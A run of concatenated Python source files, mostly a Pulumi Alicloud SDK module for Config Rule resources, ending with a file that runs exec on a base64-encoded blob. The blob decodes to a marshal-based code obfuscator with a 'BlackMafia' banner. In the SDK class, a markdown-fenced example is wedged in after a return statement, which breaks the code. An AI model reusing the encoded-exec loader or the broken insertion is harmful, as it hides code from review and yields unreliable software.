The region IDs that the rule monitors, separated by commas. Only applies to rules created based on managed rules.
"""
return pulumi.get(self, "region_ids_scope")
@region_ids_scope.setter
def region_ids_scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region_ids_scope", value)
@property
@pulumi.getter(name="resourceGroupIdsScope")
def resource_group_ids_scope(self) -> Optional[pulumi.Input[str]]:
"""
The resource group IDs that the rule monitors, separated by commas. Only applies to rules created based on managed rules.
"""
return pulumi.get(self, "resource_group_ids_scope")
@resource_group_ids_scope.setter
def resource_group_ids_scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_ids_scope", value)
@property
@pulumi.getter(name="resourceTypesScopes")
def resource_types_scopes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Resource types to be evaluated. [Alibaba Cloud services that support Cloud Config.](https://www.alibabacloud.com/help/en/doc-detail/127411.htm)
"""
return pulumi.get(self, "resource_types_scopes")
@resource_types_scopes.setter
def resource_types_scopes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "resource_types_scopes", value)
@property
@pulumi.getter(name="riskLevel")
def risk_level(self) -> Optional[pulumi.Input[int]]:
"""
The risk level of the Config Rule. Valid values: `1`: Critical, `2`: Warning, `3`: Info.
"""
return pulumi.get(self, "risk_level")
@risk_level.setter
def risk_level(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "risk_level", value)
@property
@pulumi.getter(name="ruleName")
def rule_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Config Rule.
"""
return pulumi.get(self, "rule_name")
@rule_name.setter
def rule_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rule_name", value)
@property
@pulumi.getter(name="scopeComplianceResourceTypes")
def scope_compliance_resource_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Field `scope_compliance_resource_types` has been deprecated since provider version 1.124.1. Use the new field `resource_types_scope` instead.
"""
return pulumi.get(self, "scope_compliance_resource_types")
@scope_compliance_resource_types.setter
def scope_compliance_resource_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "scope_compliance_resource_types", value)
@property
@pulumi.getter(name="sourceDetailMessageType")
def source_detail_message_type(self) -> Optional[pulumi.Input[str]]:
"""
Field `source_detail_message_type` has been deprecated since provider version 1.124.1. Use the new field `config_rule_trigger_types` instead.
"""
return pulumi.get(self, "source_detail_message_type")
@source_detail_message_type.setter
def source_detail_message_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_detail_message_type", value)
@property
@pulumi.getter(name="sourceIdentifier")
def source_identifier(self) -> Optional[pulumi.Input[str]]:
"""
The identifier of the rule. For a managed rule, the value is the name of the managed rule. For a custom rule, the value is the ARN of the custom rule. For managed rules, refer to the [List of Managed Rules](https://www.alibabacloud.com/help/en/doc-detail/127404.htm).
"""
return pulumi.get(self, "source_identifier")
@source_identifier.setter
def source_identifier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_identifier", value)
@property
@pulumi.getter(name="sourceMaximumExecutionFrequency")
def source_maximum_execution_frequency(self) -> Optional[pulumi.Input[str]]:
"""
Field `source_maximum_execution_frequency` has been deprecated since provider version 1.124.1. Use the new field `maximum_execution_frequency` instead.
"""
return pulumi.get(self, "source_maximum_execution_frequency")
@source_maximum_execution_frequency.setter
def source_maximum_execution_frequency(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_maximum_execution_frequency", value)
@property
@pulumi.getter(name="sourceOwner")
def source_owner(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether you or Alibaba Cloud owns and manages the rule. Valid values: `CUSTOM_FC`: The rule is a custom rule and you own the rule. `ALIYUN`: The rule is a managed rule and Alibaba Cloud owns the rule.
"""
return pulumi.get(self, "source_owner")
@source_owner.setter
def source_owner(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_owner", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter(name="tagKeyScope")
def tag_key_scope(self) -> Optional[pulumi.Input[str]]:
"""
The tag key that the rule monitors. Only applies to rules created based on managed rules.
"""
return pulumi.get(self, "tag_key_scope")
@tag_key_scope.setter
def tag_key_scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tag_key_scope", value)
@property
@pulumi.getter(name="tagValueScope")
def tag_value_scope(self) -> Optional[pulumi.Input[str]]:
"""
The tag value that the rule monitors; use together with `tag_key_scope`. Only applies to rules created based on managed rules.
"""
return pulumi.get(self, "tag_value_scope")
@tag_value_scope.setter
def tag_value_scope(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tag_value_scope", value)
class Rule(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
config_rule_trigger_types: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
exclude_resource_ids_scope: Optional[pulumi.Input[str]] = None,
input_parameters: Optional[pulumi.Input[Mapping[str, Any]]] = None,
maximum_execution_frequency: Optional[pulumi.Input[str]] = None,
region_ids_scope: Optional[pulumi.Input[str]] = None,
resource_group_ids_scope: Optional[pulumi.Input[str]] = None,
resource_types_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
risk_level: Optional[pulumi.Input[int]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
scope_compliance_resource_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
source_detail_message_type: Optional[pulumi.Input[str]] = None,
source_identifier: Optional[pulumi.Input[str]] = None,
source_maximum_execution_frequency: Optional[pulumi.Input[str]] = None,
source_owner: Optional[pulumi.Input[str]] = None,
tag_key_scope: Optional[pulumi.Input[str]] = None,
tag_value_scope: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides an Alicloud Config Rule resource. Cloud Config checks the validity of resources based on rules. You can create rules to evaluate resources as needed.
For information about Alicloud Config Rule and how to use it, see [What is Alicloud Config Rule](https://www.alibabacloud.com/help/en/doc-detail/127388.htm).
> **NOTE:** Available in v1.99.0+.
> **NOTE:** Cloud Config supports only the `cn-shanghai` and `ap-northeast-1` regions.
> **NOTE:** If you use custom rules, you need to create your own rule functions in advance. For details, see [Create a custom rule](https://www.alibabacloud.com/help/en/doc-detail/127405.htm).
## Example Usage
```python
import pulumi
import pulumi_alicloud as alicloud
# Audit ECS instances under VPC using preset rules
example = alicloud.cfg.Rule("example",
config_rule_trigger_types="ConfigurationItemChangeNotification",
description="ecs instances in vpc",
input_parameters={
"vpc_ids": "vpc-uf6gksw4ctjd******",
},
resource_types_scopes=["ACS::ECS::Instance"],
risk_level=1,
rule_name="instances-in-vpc",
source_identifier="ecs-instances-in-vpc",
source_owner="ALIYUN")
```
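A scheduled variant clarifies the `ScheduledNotification` trigger, which requires `maximum_execution_frequency`; the rule name, scopes, and managed-rule identifier below are illustrative, not taken from the managed-rule catalog:
```python
import pulumi
import pulumi_alicloud as alicloud

# Evaluate on a fixed schedule rather than on configuration change.
# `maximum_execution_frequency` is required for ScheduledNotification triggers.
scheduled = alicloud.cfg.Rule("scheduled",
    config_rule_trigger_types="ScheduledNotification",
    maximum_execution_frequency="TwentyFour_Hours",
    region_ids_scope="cn-shanghai",
    resource_types_scopes=["ACS::OSS::Bucket"],
    risk_level=2,
    rule_name="oss-bucket-check",
    source_identifier="oss-bucket-public-read-prohibited",
    source_owner="ALIYUN")
```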
## Import
Alicloud Config Rule can be imported using the id, e.g.
```sh
$ pulumi import alicloud:cfg/rule:Rule this cr-ed4bad756057********
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] config_rule_trigger_types: The trigger type of the rule. Valid values: `ConfigurationItemChangeNotification`: The rule is triggered upon configuration changes. `ScheduledNotification`: The rule is triggered as scheduled.
:param pulumi.Input[str] description: The description of the Config Rule.
:param pulumi.Input[str] exclude_resource_ids_scope: The resource IDs that the rule excludes from monitoring, separated by commas. Only applies to rules created based on managed rules; for custom rules this field is empty.
:param pulumi.Input[Mapping[str, Any]] input_parameters: Threshold value for managed rule triggering.
:param pulumi.Input[str] maximum_execution_frequency: The frequency of the compliance evaluations. Required if the `config_rule_trigger_types` value is `ScheduledNotification`. Valid values: `One_Hour`, `Three_Hours`, `Six_Hours`, `Twelve_Hours`, `TwentyFour_Hours`.
:param pulumi.Input[str] region_ids_scope: The region IDs that the rule monitors, separated by commas. Only applies to rules created based on managed rules.
:param pulumi.Input[str] resource_group_ids_scope: The resource group IDs that the rule monitors, separated by commas. Only applies to rules created based on managed rules.
:param pulumi.Input[Sequence[pulumi.Input[str]]] resource_types_scopes: Resource types to be evaluated. [Alibaba Cloud services that support Cloud Config.](https://www.alibabacloud.com/help/en/doc-detail/127411.htm)
:param pulumi.Input[int] risk_level: The risk level of the Config Rule. Valid values: `1`: Critical, `2`: Warning, `3`: Info.
:param pulumi.Input[str] rule_name: The name of the Config Rule.
:param pulumi.Input[Sequence[pulumi.Input[str]]] scope_compliance_resource_types: Field `scope_compliance_resource_types` has been deprecated since provider version 1.124.1. Use the new field `resource_types_scope` instead.
:param pulumi.Input[str] source_detail_message_type: Field `source_detail_message_type` has been deprecated since provider version 1.124.1. Use the new field `config_rule_trigger_types` instead.
:param pulumi.Input[str] source_identifier: The identifier of the rule. For a managed rule, the value is the name of the managed rule. For a custom rule, the value is the ARN of the custom rule. For managed rules, refer to the [List of Managed Rules](https://www.alibabacloud.com/help/en/doc-detail/127404.htm).
:param pulumi.Input[str] source_maximum_execution_frequency: Field `source_maximum_execution_frequency` has been deprecated since provider version 1.124.1. Use the new field `maximum_execution_frequency` instead.
:param pulumi.Input[str] source_owner: Specifies whether you or Alibaba Cloud owns and manages the rule. Valid values: `CUSTOM_FC`: The rule is a custom rule and you own the rule. `ALIYUN`: The rule is a managed rule and Alibaba Cloud owns the rule.
:param pulumi.Input[str] tag_key_scope: The tag key that the rule monitors. Only applies to rules created based on managed rules.
:param pulumi.Input[str] tag_value_scope: The tag value that the rule monitors; use together with `tag_key_scope`. Only applies to rules created based on managed rules.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: RuleArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides an Alicloud Config Rule resource. Cloud Config checks the validity of resources based on rules. You can create rules to evaluate resources as needed.
For information about Alicloud Config Rule and how to use it, see [What is Alicloud Config Rule](https://www.alibabacloud.com/help/en/doc-detail/127388.htm).
> **NOTE:** Available in v1.99.0+.
> **NOTE:** Cloud Config supports only the `cn-shanghai` and `ap-northeast-1` regions.
> **NOTE:** If you use custom rules, you need to create your own rule functions in advance. For details, see [Create a custom rule](https://www.alibabacloud.com/help/en/doc-detail/127405.htm).
## Example Usage
```python
import pulumi
import pulumi_alicloud as alicloud
# Audit ECS instances under VPC using preset rules
example = alicloud.cfg.Rule("example",
config_rule_trigger_types="ConfigurationItemChangeNotification",
description="ecs instances in vpc",
input_parameters={
"vpc_ids": "vpc-uf6gksw4ctjd******",
},
resource_types_scopes=["ACS::ECS::Instance"],
risk_level=1,
rule_name="instances-in-vpc",
source_identifier="ecs-instances-in-vpc",
source_owner="ALIYUN")
```
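A scheduled variant clarifies the `ScheduledNotification` trigger, which requires `maximum_execution_frequency`; the rule name, scopes, and managed-rule identifier below are illustrative, not taken from the managed-rule catalog:
```python
import pulumi
import pulumi_alicloud as alicloud

# Evaluate on a fixed schedule rather than on configuration change.
# `maximum_execution_frequency` is required for ScheduledNotification triggers.
scheduled = alicloud.cfg.Rule("scheduled",
    config_rule_trigger_types="ScheduledNotification",
    maximum_execution_frequency="TwentyFour_Hours",
    region_ids_scope="cn-shanghai",
    resource_types_scopes=["ACS::OSS::Bucket"],
    risk_level=2,
    rule_name="oss-bucket-check",
    source_identifier="oss-bucket-public-read-prohibited",
    source_owner="ALIYUN")
```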
## Import
Alicloud Config Rule can be imported using the id, e.g.
```sh
$ pulumi import alicloud:cfg/rule:Rule this cr-ed4bad756057********
```
:param str resource_name: The name of the resource.
:param RuleArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(RuleArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
config_rule_trigger_types: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
exclude_resource_ids_scope: Optional[pulumi.Input[str]] = None,
input_parameters: Optional[pulumi.Input[Mapping[str, Any]]] = None,
maximum_execution_frequency: Optional[pulumi.Input[str]] = None,
region_ids_scope: Optional[pulumi.Input[str]] = None,
resource_group_ids_scope: Optional[pulumi.Input[str]] = None,
resource_types_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
risk_level: Optional[pulumi.Input[int]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
scope_compliance_resource_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
source_detail_message_type: Optional[pulumi.Input[str]] = None,
source_identifier: Optional[pulumi.Input[str]] = None,
source_maximum_execution_frequency: Optional[pulumi.Input[str]] = None,
source_owner: Optional[pulumi.Input[str]] = None,
tag_key_scope: Optional[pulumi.Input[str]] = None,
tag_value_scope: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = RuleArgs.__new__(RuleArgs)
__props__.__dict__["config_rule_trigger_types"] = config_rule_trigger_types
__props__.__dict__["description"] = description
__props__.__dict__["exclude_resource_ids_scope"] = exclude_resource_ids_scope
__props__.__dict__["input_parameters"] = input_parameters
__props__.__dict__["maximum_execution_frequency"] = maximum_execution_frequency
__props__.__dict__["region_ids_scope"] = region_ids_scope
__props__.__dict__["resource_group_ids_scope"] = resource_group_ids_scope
__props__.__dict__["resource_types_scopes"] = resource_types_scopes
if risk_level is None and not opts.urn:
raise TypeError("Missing required property 'risk_level'")
__props__.__dict__["risk_level"] = risk_level
if rule_name is None and not opts.urn:
raise TypeError("Missing required property 'rule_name'")
__props__.__dict__["rule_name"] = rule_name
if scope_compliance_resource_types is not None and not opts.urn:
warnings.warn("""Field 'scope_compliance_resource_types' has been deprecated from provider version 1.124.1. New field 'resource_types_scope' instead.""", DeprecationWarning)
pulumi.log.warn("""scope_compliance_resource_types is deprecated: Field 'scope_compliance_resource_types' has been deprecated from provider version 1.124.1. New field 'resource_types_scope' instead.""")
__props__.__dict__["scope_compliance_resource_types"] = scope_compliance_resource_types
if source_detail_message_type is not None and not opts.urn:
warnings.warn("""Field 'source_detail_message_type' has been deprecated from provider version 1.124.1. New field 'config_rule_trigger_types' instead.""", DeprecationWarning)
pulumi.log.warn("""source_detail_message_type is deprecated: Field 'source_detail_message_type' has been deprecated from provider version 1.124.1. New field 'config_rule_trigger_types' instead.""")
__props__.__dict__["source_detail_message_type"] = source_detail_message_type
if source_identifier is None and not opts.urn:
raise TypeError("Missing required property 'source_identifier'")
__props__.__dict__["source_identifier"] = source_identifier
if source_maximum_execution_frequency is not None and not opts.urn:
warnings.warn("""Field 'source_maximum_execution_frequency' has been deprecated from provider version 1.124.1. New field 'maximum_execution_frequency' instead.""", DeprecationWarning)
pulumi.log.warn("""source_maximum_execution_frequency is deprecated: Field 'source_maximum_execution_frequency' has been deprecated from provider version 1.124.1. New field 'maximum_execution_frequency' instead.""")
__props__.__dict__["source_maximum_execution_frequency"] = source_maximum_execution_frequency
if source_owner is None and not opts.urn:
raise TypeError("Missing required property 'source_owner'")
__props__.__dict__["source_owner"] = source_owner
__props__.__dict__["tag_key_scope"] = tag_key_scope
__props__.__dict__["tag_value_scope"] = tag_value_scope
__props__.__dict__["status"] = None
super(Rule, __self__).__init__(
'alicloud:cfg/rule:Rule',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
config_rule_trigger_types: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
exclude_resource_ids_scope: Optional[pulumi.Input[str]] = None,
input_parameters: Optional[pulumi.Input[Mapping[str, Any]]] = None,
maximum_execution_frequency: Optional[pulumi.Input[str]] = None,
region_ids_scope: Optional[pulumi.Input[str]] = None,
resource_group_ids_scope: Optional[pulumi.Input[str]] = None,
resource_types_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
risk_level: Optional[pulumi.Input[int]] = None,
rule_name: Optional[pulumi.Input[str]] = None,
scope_compliance_resource_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
source_detail_message_type: Optional[pulumi.Input[str]] = None,
source_identifier: Optional[pulumi.Input[str]] = None,
source_maximum_execution_frequency: Optional[pulumi.Input[str]] = None,
source_owner: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tag_key_scope: Optional[pulumi.Input[str]] = None,
tag_value_scope: Optional[pulumi.Input[str]] = None) -> 'Rule':
"""
Get an existing Rule resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] config_rule_trigger_types: The trigger type of the rule. Valid values: `ConfigurationItemChangeNotification`: The rule is triggered upon configuration changes. `ScheduledNotification`: The rule is triggered as scheduled.
:param pulumi.Input[str] description: The description of the Config Rule.
:param pulumi.Input[str] exclude_resource_ids_scope: The resource IDs that the rule excludes from monitoring, separated by commas. Only applies to rules created based on managed rules; for custom rules this field is empty.
:param pulumi.Input[Mapping[str, Any]] input_parameters: Threshold value for managed rule triggering.
:param pulumi.Input[str] maximum_execution_frequency: The frequency of the compliance evaluations. Required if the `config_rule_trigger_types` value is `ScheduledNotification`. Valid values: `One_Hour`, `Three_Hours`, `Six_Hours`, `Twelve_Hours`, `TwentyFour_Hours`.
:param pulumi.Input[str] region_ids_scope: The region IDs that the rule monitors, separated by commas. Only applies to rules created based on managed rules.
:param pulumi.Input[str] resource_group_ids_scope: The resource group IDs that the rule monitors, separated by commas. Only applies to rules created based on managed rules.
:param pulumi.Input[Sequence[pulumi.Input[str]]] resource_types_scopes: Resource types to be evaluated. [Alibaba Cloud services that support Cloud Config.](https://www.alibabacloud.com/help/en/doc-detail/127411.htm)
:param pulumi.Input[int] risk_level: The risk level of the Config Rule. Valid values: `1`: Critical, `2`: Warning, `3`: Info.
:param pulumi.Input[str] rule_name: The name of the Config Rule.
:param pulumi.Input[Sequence[pulumi.Input[str]]] scope_compliance_resource_types: Field `scope_compliance_resource_types` has been deprecated since provider version 1.124.1. Use the new field `resource_types_scope` instead.
:param pulumi.Input[str] source_detail_message_type: Field `source_detail_message_type` has been deprecated since provider version 1.124.1. Use the new field `config_rule_trigger_types` instead.
:param pulumi.Input[str] source_identifier: The identifier of the rule. For a managed rule, the value is the name of the managed rule. For a custom rule, the value is the ARN of the custom rule. For managed rules, refer to the [List of Managed Rules](https://www.alibabacloud.com/help/en/doc-detail/127404.htm).
:param pulumi.Input[str] source_maximum_execution_frequency: Field `source_maximum_execution_frequency` has been deprecated since provider version 1.124.1. Use the new field `maximum_execution_frequency` instead.
:param pulumi.Input[str] source_owner: Specifies whether you or Alibaba Cloud owns and manages the rule. Valid values: `CUSTOM_FC`: The rule is a custom rule and you own the rule. `ALIYUN`: The rule is a managed rule and Alibaba Cloud owns the rule.
:param pulumi.Input[str] tag_key_scope: The tag key that the rule monitors. Only applies to rules created based on managed rules.
:param pulumi.Input[str] tag_value_scope: The tag value that the rule monitors; use together with `tag_key_scope`. Only applies to rules created based on managed rules.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _RuleState.__new__(_RuleState)
__props__.__dict__["config_rule_trigger_types"] = config_rule_trigger_types
__props__.__dict__["description"] = description
__props__.__dict__["exclude_resource_ids_scope"] = exclude_resource_ids_scope
__props__.__dict__["input_parameters"] = input_parameters
__props__.__dict__["maximum_execution_frequency"] = maximum_execution_frequency
__props__.__dict__["region_ids_scope"] = region_ids_scope
__props__.__dict__["resource_group_ids_scope"] = resource_group_ids_scope
__props__.__dict__["resource_types_scopes"] = resource_types_scopes
__props__.__dict__["risk_level"] = risk_level
__props__.__dict__["rule_name"] = rule_name
__props__.__dict__["scope_compliance_resource_types"] = scope_compliance_resource_types
__props__.__dict__["source_detail_message_type"] = source_detail_message_type
__props__.__dict__["source_identifier"] = source_identifier
__props__.__dict__["source_maximum_execution_frequency"] = source_maximum_execution_frequency
__props__.__dict__["source_owner"] = source_owner
__props__.__dict__["status"] = status
__props__.__dict__["tag_key_scope"] = tag_key_scope
__props__.__dict__["tag_value_scope"] = tag_value_scope
return Rule(resource_name, opts=opts, __props__=__props__)
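        # The assignments above follow a simple rehydrate-from-state pattern: allocate a bare
        # props object without running __init__, copy each state field into its __dict__, then
        # construct the resource from it. A stripped-down, provider-free sketch of the same idea
        # (class and field names here are illustrative, not part of the SDK):

```python
class _State:
    """Bare attribute bag; fields are set directly on __dict__, as in _RuleState above."""

class Resource:
    def __init__(self, name, props):
        self.name = name
        self.__dict__.update(props.__dict__)

    @classmethod
    def get(cls, name, state):
        props = _State.__new__(_State)    # allocate without running __init__
        for key, value in state.items():  # mirrors the __props__.__dict__[...] lines
            props.__dict__[key] = value
        return cls(name, props)

rule = Resource.get("example", {"rule_name": "required-tags", "risk_level": 1})
print(rule.rule_name, rule.risk_level)  # required-tags 1
```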
@property
@pulumi.getter(name="configRuleTriggerTypes")
def config_rule_trigger_types(self) -> pulumi.Output[str]:
"""
The trigger type of the rule. Valid values: `ConfigurationItemChangeNotification`: The rule is triggered upon configuration changes. `ScheduledNotification`: The rule is triggered as scheduled.
"""
return pulumi.get(self, "config_rule_trigger_types")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The description of the Config Rule.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="excludeResourceIdsScope")
def exclude_resource_ids_scope(self) -> pulumi.Output[Optional[str]]:
"""
        The resource IDs that are excluded from monitoring, separated by commas. Only applies to rules created based on managed rules; for custom rules this field is empty.
"""
return pulumi.get(self, "exclude_resource_ids_scope")
@property
@pulumi.getter(name="inputParameters")
def input_parameters(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
"""
Threshold value for managed rule triggering.
"""
return pulumi.get(self, "input_parameters")
@property
@pulumi.getter(name="maximumExecutionFrequency")
def maximum_execution_frequency(self) -> pulumi.Output[str]:
"""
        The frequency of the compliance evaluations. Required when `config_rule_trigger_types` is `ScheduledNotification`. Valid values: `One_Hour`, `Three_Hours`, `Six_Hours`, `Twelve_Hours`, `TwentyFour_Hours`.
"""
return pulumi.get(self, "maximum_execution_frequency")
@property
@pulumi.getter(name="regionIdsScope")
def region_ids_scope(self) -> pulumi.Output[Optional[str]]:
"""
        The region IDs that the rule monitors, separated by commas. Only applies to rules created based on managed rules.
"""
return pulumi.get(self, "region_ids_scope")
@property
@pulumi.getter(name="resourceGroupIdsScope")
def resource_group_ids_scope(self) -> pulumi.Output[Optional[str]]:
"""
        The resource group IDs that the rule monitors, separated by commas. Only applies to rules created based on managed rules.
"""
return pulumi.get(self, "resource_group_ids_scope")
@property
@pulumi.getter(name="resourceTypesScopes")
def resource_types_scopes(self) -> pulumi.Output[Sequence[str]]:
"""
Resource types to be evaluated. [Alibaba Cloud services that support Cloud Config.](https://www.alibabacloud.com/help/en/doc-detail/127411.htm)
"""
return pulumi.get(self, "resource_types_scopes")
@property
@pulumi.getter(name="riskLevel")
def risk_level(self) -> pulumi.Output[int]:
"""
        The risk level of the Config Rule. Valid values: `1`: Critical, `2`: Warning, `3`: Info.
"""
return pulumi.get(self, "risk_level")
@property
@pulumi.getter(name="ruleName")
def rule_name(self) -> pulumi.Output[str]:
"""
The name of the Config Rule.
"""
return pulumi.get(self, "rule_name")
@property
@pulumi.getter(name="scopeComplianceResourceTypes")
def scope_compliance_resource_types(self) -> pulumi.Output[Sequence[str]]:
"""
        Field `scope_compliance_resource_types` has been deprecated since provider version 1.124.1. Use the new field `resource_types_scope` instead.
"""
return pulumi.get(self, "scope_compliance_resource_types")
@property
@pulumi.getter(name="sourceDetailMessageType")
def source_detail_message_type(self) -> pulumi.Output[str]:
"""
        Field `source_detail_message_type` has been deprecated since provider version 1.124.1. Use the new field `config_rule_trigger_types` instead.
"""
return pulumi.get(self, "source_detail_message_type")
@property
@pulumi.getter(name="sourceIdentifier")
def source_identifier(self) -> pulumi.Output[str]:
"""
The identifier of the rule. For a managed rule, the value is the name of the managed rule. For a custom rule, the value is the ARN of the custom rule. Using managed rules, refer to [List of Managed rules.](https://www.alibabacloud.com/help/en/doc-detail/127404.htm)
"""
return pulumi.get(self, "source_identifier")
@property
@pulumi.getter(name="sourceMaximumExecutionFrequency")
def source_maximum_execution_frequency(self) -> pulumi.Output[str]:
"""
        Field `source_maximum_execution_frequency` has been deprecated since provider version 1.124.1. Use the new field `maximum_execution_frequency` instead.
"""
return pulumi.get(self, "source_maximum_execution_frequency")
@property
@pulumi.getter(name="sourceOwner")
def source_owner(self) -> pulumi.Output[str]:
"""
Specifies whether you or Alibaba Cloud owns and manages the rule. Valid values: `CUSTOM_FC`: The rule is a custom rule and you own the rule. `ALIYUN`: The rule is a managed rule and Alibaba Cloud owns the rule.
"""
return pulumi.get(self, "source_owner")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
return pulumi.get(self, "status")
@property
@pulumi.getter(name="tagKeyScope")
def tag_key_scope(self) -> pulumi.Output[Optional[str]]:
"""
        The tag key that the rule monitors. Only applies to rules created based on managed rules.
"""
return pulumi.get(self, "tag_key_scope")
@property
@pulumi.getter(name="tagValueScope")
def tag_value_scope(self) -> pulumi.Output[Optional[str]]:
"""
        The tag value that the rule monitors; use together with `tag_key_scope`. Only applies to rules created based on managed rules.
"""
return pulumi.get(self, "tag_value_scope")
# File: dfs/datasheets/writers/__init__.py (shoeberto/dfs-data-tooling, MIT)
from dfs.datasheets.writers import plot
from dfs.datasheets.writers import treatment
from dfs.datasheets.writers import superplot
# File: pypagai/models/model_rnet.py (gcouti/pypagAI, Apache-2.0)
from __future__ import print_function
"""
TODO: Implement it inspired on
https://github.com/YerevaNN/R-NET-in-Keras
"""
# File: Prem.py (Box95-Crew/Dreamless-, Apache-2.0)
#compile by Box95 & 96 #github : https://github.com/Box95-Crew
import base64
exec(base64.b64decode('''aW1wb3J0IG1hcnNoYWwsIG9zLCB0aW1lCgpiYW5uZXI9KCIiIlwwMzNbMTszNm0KICAgICAgICAgICAgICAgICAgICAgIAogICAgIF8gIF8KICAgX3wgfHwgfF8gICAgICAgICAgXDAzM1sxOzMxbUNPTVBJTEVSIFBZVEhPTlwwMzNbMTszNm0KICB8XyAgLi4gIF98CiAgfF8gICAgICBffCAgICAgICAgIFwwMzNbMTszMW1Db250YWN0PT4wMzA5NDE2MTQ1N1wwMzNbMTszNm0KICAgIHxffHxffCAgICAgICAgICAgXDAzM1sxOzMxbUJsYWNrTWFmaWEgCiIiIikKZGVmIHB5KCk6Cgl0cnk6CgkJb3Muc3lzdGVtKCdjbGVhcicpCgkJcHJpbnQoYmFubmVyKQoJCWE9aW5wdXQoIlwwMzNbMTszN20gRmlsZSBuYW1lID0+IFwwMzNbMTszMm0iKQoJCXg9b3BlbihhKS5yZWFkKCkKCQliPWNvbXBpbGUoeCwnJywnZXhlYycpCgkJYz1tYXJzaGFsLmR1bXBzKGIpCgkJZD1vcGVuKCJIYXNpbF8iK2EsJ3cnKQoJCWQud3JpdGUoJ2ltcG9ydCBtYXJzaGFsXG4nKQoJCWQud3JpdGUoJ2V4ZWMobWFyc2hhbC5sb2FkcygnK3JlcHIoYykrJykpJykKCQlkLmNsb3NlKCkKCQl0aW1lLnNsZWVwKDEuNSkKCQlwcmludCgiXDAzM1sxOzMybUZpbGUgTXVrYW1hbCBobyBnYWk6IFwwMzNbMTszNm1IYXNpbF8iK2EpCgkJcHJpbnQoKQoJZXhjZXB0IEtleWJvYXJkSW50ZXJydXB0OgoJCXByaW50KCJcblwwMzNbMTszMW1bIV0gRVJST1I6IGFwIGppbiBmaWxlcyBrbyBtdWthbWFsIGthcm5hIGNoYWh0eSBpbiBrbyB5YXFlZW5pIGJuYWluICIpCgkJZXhpdCgpCgkKZGVmIHB5MigpOgoJdHJ5OgoJCW9zLnN5c3RlbSgnY2xlYXInKQoJCXByaW50KGJhbm5lcikKCQlhPXJhd19pbnB1dCgiXDAzM1sxOzM3bSBOYW1hIEZpbGUgPT4gXDAzM1sxOzMybSIpCgkJeD1vcGVuKGEpLnJlYWQoKQoJCWI9Y29tcGlsZSh4LCcnLCdleGVjJykKCQljPW1hcnNoYWwuZHVtcHMoYikKCQlkPW9wZW4oIkhhc2lsXyIrYSwndycpCgkJZC53cml0ZSgnaW1wb3J0IG1hcnNoYWxcbicpCgkJZC53cml0ZSgnZXhlYyhtYXJzaGFsLmxvYWRzKCcrcmVwcihjKSsnKSknKQoJCWQuY2xvc2UoKQoJCXRpbWUuc2xlZXAoMS41KQoJCXBya